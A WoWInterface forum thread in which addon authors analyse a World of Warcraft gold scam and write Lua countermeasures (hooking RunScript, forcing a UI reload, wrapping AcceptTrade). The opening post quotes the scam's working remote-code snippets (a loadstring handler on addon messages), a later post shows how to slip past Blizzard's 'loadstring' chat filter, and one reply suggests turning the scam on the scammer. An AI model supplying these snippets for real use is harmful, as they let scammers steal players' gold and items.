Quantcast AcceptTrade gold scamming, catching hardware events - WoWInterface
Thread Tools Display Modes
07-13-16, 11:38 PM   #1
Ketho
A Molten Giant
 
Ketho's Avatar
AddOn Author - Click to view addons
Join Date: Mar 2010
Posts: 694
AcceptTrade gold scamming, catching hardware events

There have been some gold scams with social engineering involved, if listening to totally shady strangers to run X script could be counted as that.
Would an addon be able to effectively safeguard against that?

https://www.reddit.com/r/wow/comment...h_a_scam_that/
http://us.battle.net/wow/en/forum/topic/20745644941

Run by the victim
Code:
/run RemoveExtraSpaces = RunScript
Whispered to victim
Code:
local f = CreateFrame("Button") f:RegisterEvent("CHAT_MSG_ADDON") f:SetScript("OnEvent", function(_, _, _, msg) pcall(loadstring(msg)) end) RegisterAddonMessagePrefix("somePrefix")
Addon channel
Code:
SendAddonMessage("somePrefix", RemoveExtraSpaces(print("Hello World")), "WHISPER", GetUnitName("target", true))

I tried thinking of a few possible counter measures:
  • Prehooking AcceptTrade() with additional checks, but Blizzard has it upvalued.
    Maybe it could be still useful to prehook it if the script is not something like TradeFrameTradeButton:Click()
  • Posthooking RemoveExtraSpaces() and checking if the function reference changed, but had to hook RunScript() and DevTools_DumpCommand() instead

So I'm trying to call ReloadUI() to remove the script asap. Unless the culprit was literally standing next to the player

But I don't know how to set a secure attribute for key/button presses and right-clicks, so that it would also /reload at the press of any button.
OnKeyDown / OnKeyUp are not able to trigger a hardware event for me.

http://forums.wowace.com/showthread.php?t=20110


Lua Code:
  1. local addonName = ...
  2. local f = CreateFrame("Frame")
  3. local db
  4.  
  5. local msg = "SafeTrade detected a potential exploit with |cffFFFF00%s|r"
  6. local msg_warn = msg..".\n\nClick anywhere to /reload."
  7. local msg_done = msg.." and /reloaded your UI.\n\nRunning scripts could compromise your character causing the loss of items or gold."
  8.  
  9. StaticPopupDialogs.SAFETRADE_WARNING = {
  10.     text = "%s",
  11.     button1 = OKAY,
  12.     exclusive = 1, whileDead = 1, showAlert = 1,
  13. }
  14.  
  15. function f:OnEvent(event, addon)
  16.     if addon == addonName then
  17.         SafeTradeDB = SafeTradeDB or {}
  18.         db = SafeTradeDB -- init savedvars
  19.         if db.warning then
  20.             StaticPopup_Show("SAFETRADE_WARNING", msg_done:format(db.warning))
  21.             db.warning = nil
  22.         end
  23.         self:SetHook("RunScript")
  24.    
  25.     elseif addon == "Blizzard_DebugTools" then
  26.         self:SetHook("DevTools_DumpCommand")
  27.     end
  28. end
  29.  
  30. function f:SetHook(func)
  31.     hooksecurefunc(func, function()
  32.         if _G[func] == RemoveExtraSpaces then
  33.             -- reload asap, they cant be that fast ... right?
  34.             db.warning = "RemoveExtraSpaces"
  35.             StaticPopup_Show("SAFETRADE_WARNING", msg_warn:format(db.warning))
  36.             self:CatchHW()
  37.         end
  38.     end)
  39. end
  40.  
  41. local btn
  42.  
  43. function f:CatchHW()
  44.     if not btn then
  45.         btn = CreateFrame("Button", nil, nil, "SecureActionButtonTemplate")
  46.         btn:SetAllPoints(UIParent)
  47.         btn:SetAttribute("type", "macro") -- only left-click; how to include right-click?
  48.         btn:SetAttribute("macrotext", "/reload")
  49.         --btn:SetScript("OnKeyDown", ReloadUI) -- does not generate hardware events; any attributes for key presses?
  50.        
  51.         btn:SetFrameStrata("TOOLTIP")
  52.         btn:SetFrameLevel(1) -- ScriptErrorsFrame/SwatterErrorFrame somehow still is on top (?)
  53.     end
  54. end
  55.  
  56. f:RegisterEvent("ADDON_LOADED")
  57. f:SetScript("OnEvent", f.OnEvent)
__________________

Last edited by Ketho : 07-14-16 at 05:31 PM.
  Reply With Quote
07-13-16, 11:58 PM   #2
myrroddin
A Molten Giant
 
myrroddin's Avatar
AddOn Author - Click to view addons
Join Date: Oct 2008
Posts: 644
Couldn't you check the AddOn message events, see if the incoming message is the malware, and if so, exit out?

Or, if you want to be evil, send that same message back to the source, and scam the scammer?
  Reply With Quote
07-14-16, 12:18 AM   #3
Ketho
A Molten Giant
 
Ketho's Avatar
AddOn Author - Click to view addons
Join Date: Mar 2010
Posts: 694
Originally Posted by myrroddin View Post
Couldn't you check the AddOn message events, see if the incoming message is the malware, and if so, exit out?

That is a good idea, to proactively check any incoming addon or chat messages for anything suspicious
Would it also be possible to unregister an addon prefix?

Scamming the scammer would be nice if that was even possible, sounds a bit like digital warfare; but they might use a compromised or level 1 char

Last edited by Ketho : 07-14-16 at 05:24 AM.
  Reply With Quote
07-14-16, 07:02 AM   #4
myrroddin
A Molten Giant
 
myrroddin's Avatar
AddOn Author - Click to view addons
Join Date: Oct 2008
Posts: 644
Yes, during the check/exit phase, you can unregister the prefix. While there is no direct API either natively or with Ace3, I would presume registering "" would do the trick. Wrap it within an if/then so you don't accidentally re-register something you'd want!

While true, the scammer could use a compromised character (of any level), the social hack indicates the scammer would be max level. Afterall, who'd join a raid group for the moose, if you were being invited by someone level 1-99?

As for hacking the hacker, why not? If the message is the scam, then send the scam right back to the hacker. And if the toon has been compromised, the true owner will get fixed up by Blizzard's customer support.

I don't see any issues with this, but I'm evil.
  Reply With Quote
07-14-16, 08:45 AM   #5
Lombra
A Scalebane Royal Guard
 
Lombra's Avatar
AddOn Author - Click to view addons
Join Date: Nov 2006
Posts: 436
Why would the scammer themself be listening for incoming addon messages?

AcceptTrade doesn't require a hardware event? That is terrible. Or are they being tricked into executing that somehow?
__________________
Grab your sword and fight the Horde!
  Reply With Quote
07-14-16, 02:00 PM   #6
Resike
A Pyroguard Emberseer
AddOn Author - Click to view addons
Join Date: Mar 2010
Posts: 1,115
Originally Posted by Ketho View Post
That is a good idea, to proactively check any incoming addon or chat messages for anything suspicious
Would it also be possible to unregister an addon prefix?

Scamming the scammer would be nice if that was even possible, sounds a bit like digital warfare; but they might use a compromised or level 1 char
Wouln't work the "CHAT_MSG_ADDON" event gets executed in some kinda order and if the malware is faster then you're still fucked.
  Reply With Quote
07-14-16, 03:37 PM   #7
Kanegasi
An Aku'mai Servant
 
Kanegasi's Avatar
AddOn Author - Click to view addons
Join Date: Apr 2007
Posts: 37
What about something like saving AcceptTrade() into a local object, wiping the main one to nil, then setting TradeFrameTradeButton's onclick script to call the local object. That way, a trade is accepted only if the Trade UI's confirm button is clicked.
  Reply With Quote
07-14-16, 05:17 PM   #8
Ketho
A Molten Giant
 
Ketho's Avatar
AddOn Author - Click to view addons
Join Date: Mar 2010
Posts: 694
Originally Posted by Lombra View Post
AcceptTrade doesn't require a hardware event? That is terrible. Or are they being tricked into executing that somehow?

Yes, they are being tricked into executing that by catching any hardware events with a secure frame
I don't know how exactly they do that, but I could only manage catching any left-clicks

Originally Posted by Kanegasi View Post
What about something like saving AcceptTrade() into a local object, wiping the main one to nil, then setting TradeFrameTradeButton's onclick script to call the local object. That way, a trade is accepted only if the Trade UI's confirm button is clicked.

Good idea. Or maybe without wiping the global one to nil, to not break any other Trade UI related addons.
Lua Code:
  1. local oldAcceptTrade = AcceptTrade
  2.  
  3. function AcceptTrade()
  4.     if RunScript ~= RemoveExtraSpaces then
  5.         oldAcceptTrade()
  6.     end
  7. end
  8.  
  9. TradeFrameTradeButton:SetScript("OnClick", AcceptTrade)

It might be really obvious, but why is RemoveExtraSpaces not a local scope function It's only being used in ChatFrame.lua

@Resike: So there is no way to stop an addon message before it already has done the damage?


Edit: It looks like Blizzard is already checking for any suspicious whisper messages?



It's not possible to say "loadstring" anymore in chat channels, including whisper

But they could still whisper something like
Lua Code:
  1. pcall(_G["load".."string"](msg))

Last edited by Ketho : 07-15-16 at 07:43 PM.
  Reply With Quote
07-14-16, 06:38 PM   #9
Resike
A Pyroguard Emberseer
AddOn Author - Click to view addons
Join Date: Mar 2010
Posts: 1,115
Originally Posted by Ketho View Post
@Resike: So there is no way to stop an addon message before it already has done the damage?
I'm not sure how does it works, it could be served alphabetically or based on time when the event is registered or a combination of this two, it even could be serving faster/smaller functions first and the bigger ones later. It's specially hard to reverse engineer it if the code does't comes from an addon but from a in-game script.
  Reply With Quote
07-15-16, 10:40 AM   #10
SDPhantom
A Pyroguard Emberseer
 
SDPhantom's Avatar
AddOn Author - Click to view addons
Join Date: Jul 2006
Posts: 1,544
When it comes to the chat system, there are many attack vectors they can eventually move to with ease. One thing that can be done is completely nullify the RunScript() and DevTools_DumpCommand() functions while a chat event is being handled.

Lua Code:
  1. local FuncList={
  2.     "RunScript";
  3.     "DevTools_DumpCommand";
  4. };
  5.  
  6. local FuncCache={};
  7. for k,v in ipairs(FuncList) do FuncCache[v]=_G[v]; end
  8.  
  9. local function DummyFunc() end
  10. local OldHandler=ChatFrame_OnEvent;
  11. local InChatEvent=false;
  12.  
  13. local EventFrame=CreateFrame("Frame");
  14. EventFrame:RegisterEvent("ADDON_LOADED");
  15. EventFrame:SetScript("OnEvent",function()
  16.     for k,v in ipairs(FuncList) do
  17.         if not FuncCache[v] then
  18.             FuncCache[v]=_G[v];
  19.             if InChatEvent then _G[v]=DummyFunc; end
  20.         end
  21.     end
  22. end);
  23.  
  24. function ChatFrame_OnEvent(...)
  25.     for k,v in pairs(FuncCache) do _G[k]=DummyFunc; end
  26.     InChatEvent=true;
  27.     OldHandler(...);
  28.     InChatEvent=false;
  29.     for k,v in pairs(FuncCache) do _G[k]=v; end
  30. end

To protect more functions, add them to the FuncList table.
__________________
"All I want is a pretty girl, a decent meal, and the right to shoot lightning at fools."
-Anders (Dragon Age: Origins - Awakening)

Last edited by SDPhantom : 07-15-16 at 10:55 AM.
  Reply With Quote

WoWInterface » Developer Discussions » General Authoring Discussion » AcceptTrade gold scamming, catching hardware events

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off